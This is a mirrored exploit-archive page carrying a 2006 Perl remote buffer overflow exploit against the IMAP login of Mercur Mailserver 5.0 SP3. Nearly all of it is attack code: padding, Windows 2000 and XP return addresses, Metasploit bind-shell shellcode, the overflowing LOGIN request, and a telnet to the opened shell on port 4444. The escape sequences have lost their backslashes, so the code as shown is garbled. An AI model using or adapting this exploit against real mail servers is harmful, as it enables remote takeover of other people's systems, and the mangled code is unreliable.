Mercur Mailserver 5.0 SP3 (IMAP) Remote Buffer Overflow Exploit (2)

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : Mercur Mailserver 5.0 SP3 (IMAP) Remote Buffer Overflow Exploit (2)
# Published : 2006-09-11
# Author : Jacopo Cervini
# Previous Title : MS Internet Explorer COM Object Remote Heap Overflow Exploit
# Next Title : RaidenHTTPD 1.1.49 (SoftParserFileXml) Remote Code Execution Exploit

#!/usr/bin/perl
# Tested on Windows 2k Sp4 Italian and English version and Win XP Pro SP2 Italian and English #version
# Perl script based on Sami FTP server remote exploit by Critical Security
# http://www.securityfocus.com/bid/17138
# acaro [at] jervus.it


use IO::Socket::INET;
use Switch;

if (@ARGV < 2) {
print "--------------------------------------------------------------------n";
print "Usage : mercur-login.pl -hTargetIPAddress -oTargetReturnAddressn";
print " Return address: n";
print " 1 - 0x0258d087 Windows 2k Sp4 English Italian Versionn";
print " 2 - 0x020cd083 Windows XP Pro SP2 English Italian Versionn";
print " If values not specified, Windows 2k Sp4 will be used.n";
print " Example : ./mercur-login.pl -h127.0.0.1 -o1n";
print "--------------------------------------------------------------------n";
}

my $host =   "127.0.0.1";  

my $port = 143;
my $reply;
my $request;
my $pad = "x90"x268;
my $eip = "x87xd0x58x02"; # default eip is for Win2k SP4


foreach (@ARGV) {
$host = $1 if ($_=~/-h((.*).(.*).(.*).(.*))/);
$eip = $1 if ($_=~/-o(.*)/);
}

switch ($eip) {
case 1 { $eip = "x87xd0x58x02" } # Windows Win2k SP4 English and Italian version
case 2 { $eip = "x83xd0x0cx02" } # Windows XP SP2 English and Italian version
}

#Metasploit bind 4444 shellcode
my $shellcode=
"x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90" .
"x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90" .
"x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90" .
"x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90" .
"xd9xeexd9x74x24xf4x5bx31xc9xb1x5ex81x73x17xe0x66" .
"x1cxc2x83xebxfcxe2xf4x1cx8ex4axc2xe0x66x4fx97xb6" .
"x31x97xaexc4x7ex97x87xdcxedx48xc7x98x67xf6x49xaa" .
"x7ex97x98xc0x67xf7x21xd2x2fx97xf6x6bx67xf2xf3x1f" .
"x9ax2dx02x4cx5exfcxb6xe7xa7xd3xcfxe1xa1xf7x30xdb" .
"x1ax38xd6x95x87x97x98xc4x67xf7xa4x6bx6ax57x49xba" .
"x7ax1dx29x6bx62x97xc3x08x8dx1exf3x20x39x42x9fxbb" .
"xa4x14xc2xbex0cx2cx9bx84xedx05x49xbbx6ax97x99xfc" .
"xedx07x49xbbx6ex4fxaax6ex28x12x2ex1fxb0x95x05x61" .
"x8ax1cxc3xe0x66x4bx94xb3xefxf9x2axc7x66x1cxc2x70" .
"x67x1cxc2x56x7fx04x25x44x7fx6cx2bx05x2fx9ax8bx44" .
"x7cx6cx05x44xcbx32x2bx39x6fxe9x6fx2bx8bxe0xf9xb7" .
"x35x2ex9dxd3x54x1cx99x6dx2dx3cx93x1fxb1x95x1dx69" .
"xa5x91xb7xf4x0cx1bx9bxb1x35xe3xf6x6fx99x49xc6xb9" .
"xefx18x4cx02x94x37xe5xb4x99x2bx3dxb5x56x2dx02xb0" .
"x36x4cx92xa0x36x5cx92x1fx33x30x4bx27x57xc7x91xb3" .
"x0ex1exc2xf1x3ax95x22x8ax76x4cx95x1fx33x38x91xb7" .
"x99x49xeaxb3x32x4bx3dxb5x46x95x05x88x25x51x86xe0" .
"xefxffx45x1ax57xdcx4fx9cx42xb0xa8xf5x3fxefx69x67" .
"x9cx9fx2exb4xa0x58xe6xf0x22x7ax05xa4x42x20xc3xe1" .
"xefx60xe6xa8xefx60xe6xacxefx60xe6xb0xebx58xe6xf0" .
"x32x4cx93xb1x37x5dx93xa9x37x4dx91xb1x99x69xc2x88" .
"x14xe2x71xf6x99x49xc6x1fxb6x95x24x1fx13x1cxaax4d" .
"xbfx19x0cx1fx33x18x4bx23x0cxe3x3dxd6x99xcfx3dx95" .
"x66x74x32x6ax62x43x3dxb5x62x2dx19xb3x99xccxc2";



my $socket = IO::Socket::INET->new(proto=>'tcp', PeerAddr=>$host, PeerPort=>$port);
$socket or die "Cannot connect to host!n";

recv($socket, $reply, 1024, 0);
print "Response:" . $reply;
$exploit = "a001 LOGIN " . $pad. $eip .$shellcode."rn";

send $socket, $exploit, 0;
print "[+] sending 1st chunkn";

$exploit = "a001 LOGIN " . $pad. $eip ."rn";

send $socket, $exploit, 0;
print "[+] sending 2nd chunkn";

print " + connecting port 4444 of $host ...n";
system("telnet $host 4444");

close $socket;
exit;

# www.Syue.com [2006-09-11]